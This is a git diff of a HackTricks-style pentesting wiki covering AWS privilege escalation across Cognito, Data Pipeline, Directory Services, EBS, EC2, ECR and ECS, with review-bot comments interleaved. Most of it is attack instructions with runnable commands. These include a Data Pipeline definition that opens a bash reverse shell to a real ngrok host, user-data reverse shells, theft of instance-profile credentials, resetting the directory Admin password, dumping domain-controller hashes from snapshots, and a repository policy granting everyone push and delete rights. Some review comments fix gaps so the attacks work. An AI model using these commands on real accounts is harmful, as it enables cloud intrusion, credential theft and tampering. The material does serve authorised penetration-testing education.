diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md similarity index 82% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md index fea511a1e..cc8d8d94f 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md @@ -1,27 +1,14 @@ # AWS - Cognito Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Cognito For more info about Cognito check: -{% content-ref url="../aws-services/aws-cognito-enum/" %} -[aws-cognito-enum](../aws-services/aws-cognito-enum/) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-cognito-enum/ +{{#endref}} ### Gathering credentials from Identity Pool @@ -107,11 +94,9 @@ aws cognito-idp admin-add-user-to-group \ An attacker with these permissions could **create/update groups** with **every IAM role that can be used by a compromised Cognito Identity Provider** and make a compromised user part of the group, accessing all those roles: -{% code overflow="wrap" %} ```bash aws cognito-idp create-group --group-name Hacked --user-pool-id --role-arn ``` -{% endcode %} **Potential Impact:** Privesc to other Cognito IAM roles. @@ -156,7 +141,7 @@ aws cognito-idp admin-enable-user \ ### `cognito-idp:AdminInitiateAuth`, **`cognito-idp:AdminRespondToAuthChallenge`** -This permission allows to login with the [**method ADMIN\_USER\_PASSWORD\_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link. +This permission allows to login with the [**method ADMIN_USER_PASSWORD_AUTH**](../aws-services/aws-cognito-enum/cognito-user-pools.md#admin_no_srp_auth-and-admin_user_password_auth)**.** For more information follow the link. ### `cognito-idp:AdminSetUserPassword` 
@@ -290,7 +275,7 @@ An attacker could also use these permissions to **enroll himself to a Cognito st ### Automatic Tools -* [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. +- [Pacu](https://github.com/RhinoSecurityLabs/pacu), the AWS exploitation framework, now includes the "cognito\_\_enum" and "cognito\_\_attack" modules that automate enumeration of all Cognito assets in an account and flag weak configurations, user attributes used for access control, etc., and also automate user creation (including MFA support) and privilege escalation based on modifiable custom attributes, usable identity pool credentials, assumable roles in id tokens, etc. For a description of the modules' functions see part 2 of the [blog post](https://rhinosecuritylabs.com/aws/attacking-aws-cognito-with-pacu-p2). For installation instructions see the main [Pacu](https://github.com/RhinoSecurityLabs/pacu) page. @@ -299,8 +284,8 @@ For a description of the modules' functions see part 2 of the [blog post](https: Sample cognito\_\_attack usage to attempt user creation and all privesc vectors against a given identity pool and user pool client: ```bash -Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools -us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients +Pacu (new:test) > run cognito__attack --username randomuser --email XX+sdfs2@gmail.com --identity_pools +us-east-2:a06XXXXX-c9XX-4aXX-9a33-9ceXXXXXXXXX --user_pool_clients 59f6tuhfXXXXXXXXXXXXXXXXXX@us-east-2_0aXXXXXXX ``` 
@@ -310,7 +295,7 @@ Sample cognito\_\_enum usage to gather all user pools, user pool clients, identi Pacu (new:test) > run cognito__enum ``` -* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation. +- [Cognito Scanner](https://github.com/padok-team/cognito-scanner) is a CLI tool in python that implements different attacks on Cognito including a privesc escalation. #### Installation @@ -326,17 +311,4 @@ $ cognito-scanner --help For more information check [https://github.com/padok-team/cognito-scanner](https://github.com/padok-team/cognito-scanner) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md new file mode 100644 index 000000000..585e407d3 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md 
@@ -0,0 +1,74 @@ +# AWS - Datapipeline Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## datapipeline + +For more info about datapipeline check: + +{{#ref}} +../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +{{#endref}} + +### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` + +Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** + +```bash +aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string +``` + +After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: + +```json +{ + "objects": [ + { + "id": "CreateDirectory", + "type": "ShellCommandActivity", + "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", + "runsOn": { "ref": "instance" } + }, + { + "id": "Default", + "scheduleType": "ondemand", + "failureAndRerunMode": "CASCADE", + "name": "Default", + "role": "assumable_datapipeline", + "resourceRole": "assumable_datapipeline" + }, + { + "id": "instance", + "name": "instance", + "type": "Ec2Resource", + "actionOnTaskFailure": "terminate", + "actionOnResourceFailure": "retryAll", + "maximumRetries": "1", + "instanceType": "t2.micro", + "securityGroups": ["default"], + "role": "assumable_datapipeline", + "resourceRole": "assumable_ec2_profile_instance" + } + ] +} +``` + +> [!NOTE] +> Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. +> +> Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). 
+ +```bash +aws datapipeline put-pipeline-definition --pipeline-id \ + --pipeline-definition file:///pipeline/definition.json +``` + +The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. + +**Potential Impact:** Direct privesc to the ec2 service role specified. + +## References + +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md new file mode 100644 index 000000000..8785f58af --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md @@ -0,0 +1,34 @@ +# AWS - Directory Services Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Directory Services + +For more info about directory services check: + +{{#ref}} +../aws-services/aws-directory-services-workdocs-enum.md +{{#endref}} + +### `ds:ResetUserPassword` + +This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ +By default, the only existent user is **Admin**. + +``` +aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. +``` + +### AWS Management Console + +It's possible to enable an **application access URL** that users from AD can access to login: + +
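Review bot: The note keys its guidance to JSON line numbers (`line 14, 15 and 27` / `line 28`), which no longer match the snippet as formatted here (the `Ec2Resource`'s `role` sits on line 26 and its `resourceRole` on 27), so it should name the fields instead: the `role`/`resourceRole` of the `Default` object and the `role` of the `Ec2Resource` must be assumable by `datapipeline.amazonaws.com`, while the `Ec2Resource`'s `resourceRole` must be an instance profile whose role trusts `ec2.amazonaws.com`. The heading lists `datapipeline:ActivatePipeline` but no activation step is shown; with `"scheduleType": "ondemand"` the `ShellCommandActivity` never runs until `aws datapipeline activate-pipeline --pipeline-id <pipeline-id>` is issued after `put-pipeline-definition`. The `--pipeline-id` placeholder was also stripped from the command, and the reverse-shell target `8.tcp.ngrok.io/13605` should be an `<attacker-host>/<port>` placeholder rather than a real listener.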
+ +And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console: + +
+ +There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md new file mode 100644 index 000000000..01661912c --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md @@ -0,0 +1,23 @@ +# AWS - DynamoDB Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## dynamodb + +For more info about dynamodb check: + +{{#ref}} +../aws-services/aws-dynamodb-enum.md +{{#endref}} + +### Post Exploitation + +As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**: + +{{#ref}} +../aws-post-exploitation/aws-dynamodb-post-exploitation.md +{{#endref}} + +### TODO: Read data abusing data Streams + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md new file mode 100644 index 000000000..ca59c9402 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md 
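Review bot: The closing sentence `There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission` stops mid-thought, so the reader cannot tell what the limitation is (presumably that these settings can only be changed from the console, not via the `ds` API); it should be completed, and each screenshot should be preceded by a line naming the console page it shows. The `ds reset-user-password` example lost its `--directory-id <directory-id>` placeholder and, unlike the sibling pages, has no `**Potential Impact:**` line — resetting `Admin` hands the attacker the directory's delegated administrator account and, if the console access described below is configured, whatever IAM role is mapped to that user, which is worth stating explicitly.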
@@ -0,0 +1,27 @@
+# AWS - EBS Privesc
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## EBS
+
+### `ebs:ListSnapshotBlocks`, `ebs:GetSnapshotBlock`, `ec2:DescribeSnapshots`
+
+An attacker with those will be able to potentially **download and analyze volumes snapshots locally** and search for sensitive information in them (like secrets or source code). Find how to do this in:
+
+{{#ref}}
+../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md
+{{#endref}}
+
+Other permissions might be also useful such as: `ec2:DescribeInstances`, `ec2:DescribeVolumes`, `ec2:DeleteSnapshot`, `ec2:CreateSnapshot`, `ec2:CreateTags`
+
+The tool [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) performs this attack to e**xtract passwords from a domain controller**.
+
+**Potential Impact:** Indirect privesc by locating sensitive information in the snapshot (you could even get Active Directory passwords).
+
+### **`ec2:CreateSnapshot`**
+
+Any AWS user possessing the **`EC2:CreateSnapshot`** permission can steal the hashes of all domain users by creating a **snapshot of the Domain Controller** mounting it to an instance they control and **exporting the NTDS.dit and SYSTEM** registry hive file for use with Impacket's secretsdump project.
+
+You can use this tool to automate the attack: [https://github.com/Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy) or you could use one of the previous techniques after creating a snapshot.
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
similarity index 77%
rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md
index 678a7bdf3..090c4e70d 100644
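Review bot: The `ec2:CreateSnapshot` section overstates what that single permission buys: taking the snapshot does not let you read it, and the workflow the text describes (mount it on an instance you control, export `NTDS.dit` and `SYSTEM`) additionally needs `ec2:CreateVolume` and `ec2:AttachVolume` plus login to that instance, or `ec2:ModifySnapshotAttribute` to share the snapshot with an attacker-owned account, or the `ebs:GetSnapshotBlock` path from the first section. Listing those next to the heading, e.g. `### \`ec2:CreateSnapshot\` (+ \`ec2:CreateVolume\`/\`ec2:AttachVolume\` or \`ec2:ModifySnapshotAttribute\`)`, would keep it consistent with the `Other permissions might be also useful` line above. A short caveat that cross-account `ModifySnapshotAttribute` is a high-signal CloudTrail event that detection rules commonly key on would fit the `**Potential Impact:**` style used elsewhere on the page.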
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md @@ -1,33 +1,20 @@ # AWS - EC2 Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## EC2 For more **info about EC2** check: -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} ### `iam:PassRole`, `ec2:RunInstances` An attacker could **create and instance attaching an IAM role and then access the instance** to steal the IAM role credentials from the metadata endpoint. -* **Access via SSH** +- **Access via SSH** Run a new instance using a **created** **ssh key** (`--key-name`) and then ssh into it (if you want to create a new one you might need to have the permission `ec2:CreateKeyPair`). @@ -37,7 +24,7 @@ aws ec2 run-instances --image-id --instance-type t2.micro \ --security-group-ids ``` -* **Access via rev shell in user data** +- **Access via rev shell in user data** You can run a new instance using a **user data** (`--user-data`) that will send you a **rev shell**. You don't need to specify security group this way. @@ -53,9 +40,9 @@ aws ec2 run-instances --image-id --instance-type t2.micro \ Be careful with GuradDuty if you use the credentials of the IAM role outside of the instance: -{% content-ref url="../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md" %} -[aws-guardduty-enum.md](../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md +{{#endref}} **Potential Impact:** Direct privesc to a any EC2 role attached to existing instance profiles. 
@@ -63,14 +50,13 @@ Be careful with GuradDuty if you use the credentials of the IAM role outside of With this set of permissions you could also **create an EC2 instance and register it inside an ECS cluster**. This way, ECS **services** will be **run** in inside the **EC2 instance** where you have access and then you can penetrate those services (docker containers) and **steal their ECS roles attached**. -{% code overflow="wrap" %} ```bash aws ec2 run-instances \ --image-id ami-07fde2ae86109a2af \ --instance-type t2.micro \ --iam-instance-profile \ --count 1 --key-name pwned \ - --user-data "file:///tmp/asd.sh" + --user-data "file:///tmp/asd.sh" # Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs) # The EC2 instance profile needs basic ECS access @@ -78,13 +64,12 @@ aws ec2 run-instances \ #!/bin/bash echo ECS_CLUSTER= >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config; ``` -{% endcode %} To learn how to **force ECS services to be run** in this new EC2 instance check: -{% content-ref url="aws-ecs-privesc.md" %} -[aws-ecs-privesc.md](aws-ecs-privesc.md) -{% endcontent-ref %} +{{#ref}} +aws-ecs-privesc.md +{{#endref}} If you **cannot create a new instance** but has the permission `ecs:RegisterContainerInstance` you might be able to register the instance inside the cluster and perform the commented attack. @@ -95,7 +80,6 @@ If you **cannot create a new instance** but has the permission `ecs:RegisterCont Similar to the previous scenario, an attacker with these permissions could **change the IAM role of a compromised instance** so he could steal new credentials.\ As an instance profile can only have 1 role, if the instance profile **already has a role** (common case), you will also need **`iam:RemoveRoleFromInstanceProfile`**. -{% code overflow="wrap" %} ```bash # Removing role from instance profile aws iam remove-role-from-instance-profile --instance-profile-name --role-name 
@@ -103,17 +87,14 @@ aws iam remove-role-from-instance-profile --instance-profile-name --role- # Add role to instance profile aws iam add-role-to-instance-profile --instance-profile-name --role-name ``` -{% endcode %} If the **instance profile has a role** and the attacker **cannot remove it**, there is another workaround. He could **find** an **instance profile without a role** or **create a new one** (`iam:CreateInstanceProfile`), **add** the **role** to that **instance profile** (as previously discussed), and **associate the instance profile** compromised to a compromised i**nstance:** -* If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* +- If the instance **doesn't have any instance** profile (`ec2:AssociateIamInstanceProfile`) \* -{% code overflow="wrap" %} ```bash aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` -{% endcode %} **Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). 
@@ -121,25 +102,21 @@ aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --ins With these permissions it's possible to change the instance profile associated to an instance so if the attack had already access to an instance he will be able to steal credentials for more instance profile roles changing the one associated with it. -* If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* +- If it **has an instance profile**, you can **remove** the instance profile (`ec2:DisassociateIamInstanceProfile`) and **associate** it \* -{% code overflow="wrap" %} ```bash aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da aws ec2 disassociate-iam-instance-profile --association-id aws ec2 associate-iam-instance-profile --iam-instance-profile Name= --instance-id ``` -{% endcode %} -* or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* +- or **replace** the **instance profile** of the compromised instance (`ec2:ReplaceIamInstanceProfileAssociation`). \* -{% code overflow="wrap" %} ```` ```bash aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name= --association-id ``` ```` -{% endcode %} **Potential Impact:** Direct privesc to a different EC2 role (you need to have compromised a AWS EC2 instance and some extra permission or specific instance profile status). @@ -148,7 +125,6 @@ aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md new file mode 100644 index 000000000..bcf68a122 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md 
@@ -0,0 +1,108 @@ +# AWS - ECR Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## ECR + +### `ecr:GetAuthorizationToken`,`ecr:BatchGetImage` + +An attacker with the **`ecr:GetAuthorizationToken`** and **`ecr:BatchGetImage`** can login to ECR and download images. + +For more info on how to download images: + +{{#ref}} +../aws-post-exploitation/aws-ecr-post-exploitation.md +{{#endref}} + +**Potential Impact:** Indirect privesc by intercepting sensitive information in the traffic. + +### `ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart` + +An attacker with the all those permissions **can login to ECR and upload images**. This can be useful to escalate privileges to other environments where those images are being used. + +To learn how to upload a new image/update one, check: + +{{#ref}} +../aws-services/aws-eks-enum.md +{{#endref}} + +### `ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart` + +Like the previous section, but for public repositories. + +### `ecr:SetRepositoryPolicy` + +An attacker with this permission could **change** the **repository** **policy** to grant himself (or even everyone) **read/write access**.\ +For example, in this example read access is given to everyone. 
+ +```bash +aws ecr set-repository-policy \ + --repository-name \ + --policy-text file://my-policy.json +``` + +Contents of `my-policy.json`: + +```json +{ + "Version": "2008-10-17", + "Statement": [ + { + "Sid": "allow public pull", + "Effect": "Allow", + "Principal": "*", + "Action": [ + "ecr:BatchCheckLayerAvailability", + "ecr:BatchGetImage", + "ecr:GetDownloadUrlForLayer" + ] + } + ] +} +``` + +### `ecr-public:SetRepositoryPolicy` + +Like the previoous section, but for public repositories.\ +An attacker can **modify the repository policy** of an ECR Public repository to grant unauthorized public access or to escalate their privileges. + +```bash +bashCopy code# Create a JSON file with the malicious public repository policy +echo '{ + "Version": "2008-10-17", + "Statement": [ + { + "Sid": "MaliciousPublicRepoPolicy", + "Effect": "Allow", + "Principal": "*", + "Action": [ + "ecr-public:GetDownloadUrlForLayer", + "ecr-public:BatchGetImage", + "ecr-public:BatchCheckLayerAvailability", + "ecr-public:PutImage", + "ecr-public:InitiateLayerUpload", + "ecr-public:UploadLayerPart", + "ecr-public:CompleteLayerUpload", + "ecr-public:DeleteRepositoryPolicy" + ] + } + ] +}' > malicious_public_repo_policy.json + +# Apply the malicious public repository policy to the ECR Public repository +aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json +``` + +**Potential Impact**: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images. + +### `ecr:PutRegistryPolicy` + +An attacker with this permission could **change** the **registry policy** to grant himself, his account (or even everyone) **read/write access**. + +```bash +aws ecr set-repository-policy \ + --repository-name \ + --policy-text file://my-policy.json +``` + +{{#include ../../../banners/hacktricks-training.md}} 
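Review bot: The example under `ecr:PutRegistryPolicy` at the end of the hunk repeats the `aws ecr set-repository-policy --repository-name ...` command from the `ecr:SetRepositoryPolicy` section, but a registry policy is account-level and is written with `aws ecr put-registry-policy --policy-text file://my-policy.json` (no repository name). As far as I recall, registry policies only scope replication and pull-through-cache actions (e.g. `ecr:ReplicateImage`, `ecr:CreateRepository`), so the "read/write access" impact claimed there should be hedged or retested rather than copied from the repository-policy section. The `ecr-public` example also carries a `bashCopy code#` paste artifact on its first line that should read just `# Create a JSON file with the malicious public repository policy`. The first section's impact line speaks of "intercepting sensitive information in the traffic", but what `ecr:BatchGetImage` yields is the image layers themselves, so `**Potential Impact:** Indirect privesc by finding secrets (credentials, keys, config) baked into the downloaded image layers.` states it more accurately.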
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md similarity index 75% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md index 793ce44c2..31eaefddb 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md @@ -1,27 +1,14 @@ # AWS - ECS Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## ECS More **info about ECS** in: -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-ecs-enum.md +{{#endref}} ### `iam:PassRole`, `ecs:RegisterTaskDefinition`, `ecs:RunTask` @@ -105,7 +92,6 @@ aws ecs update-service --cluster \ Actually, just with those permissions it's possible to use overrides to executer arbitrary commands in a container with an arbitrary role with something like: -{% code overflow="wrap" %} ```bash aws ecs run-task \ --task-definition "" \ @@ -113,7 +99,6 @@ aws ecs run-task \ --cluster \ --network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"\"]}}" ``` -{% endcode %} **Potential Impact:** Direct privesc to any ECS role. @@ -123,9 +108,8 @@ This scenario is like the previous ones but **without** the **`iam:PassRole`** p This is still interesting because if you can run an arbitrary container, even if it's without a role, you could **run a privileged container to escape** to the node and **steal the EC2 IAM role** and the **other ECS containers roles** running in the node.\ You could even **force other tasks to run inside the EC2 instance** you compromise to steal their credentials (as discussed in the [**Privesc to node section**](aws-ecs-privesc.md#privesc-to-node)). -{% hint style="warning" %} -This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate. -{% endhint %} +> [!WARNING] +> This attack is only possible if the **ECS cluster is using EC2** instances and not Fargate. ```bash printf '[ @@ -175,7 +159,7 @@ However, in order to do that, the container instance need to be running the **Ex Therefore, the attacker cloud try to: -* **Try to run a command** in every running container +- **Try to run a command** in every running container ```bash # List enableExecuteCommand on each task 
@@ -195,10 +179,10 @@ aws ecs execute-command --interactive \ --task "$TASK_ARN" ``` -* If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]` -* If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]` -* If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]` -* If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]` +- If he has **`ecs:RunTask`**, run a task with `aws ecs run-task --enable-execute-command [...]` +- If he has **`ecs:StartTask`**, run a task with `aws ecs start-task --enable-execute-command [...]` +- If he has **`ecs:CreateService`**, create a service with `aws ecs create-service --enable-execute-command [...]` +- If he has **`ecs:UpdateService`**, update a service with `aws ecs update-service --enable-execute-command [...]` You can find **examples of those options** in **previous ECS privesc sections**. @@ -208,17 +192,17 @@ You can find **examples of those options** in **previous ECS privesc sections**. Check in the **ssm privesc page** how you can abuse this permission to **privesc to ECS**: -{% content-ref url="aws-ssm-privesc.md" %} -[aws-ssm-privesc.md](aws-ssm-privesc.md) -{% endcontent-ref %} +{{#ref}} +aws-ssm-privesc.md +{{#endref}} ### `iam:PassRole`, `ec2:RunInstances` Check in the **ec2 privesc page** how you can abuse these permissions to **privesc to ECS**: -{% content-ref url="aws-ec2-privesc.md" %} -[aws-ec2-privesc.md](aws-ec2-privesc.md) -{% endcontent-ref %} +{{#ref}} +aws-ec2-privesc.md +{{#endref}} ### `?ecs:RegisterContainerInstance` 
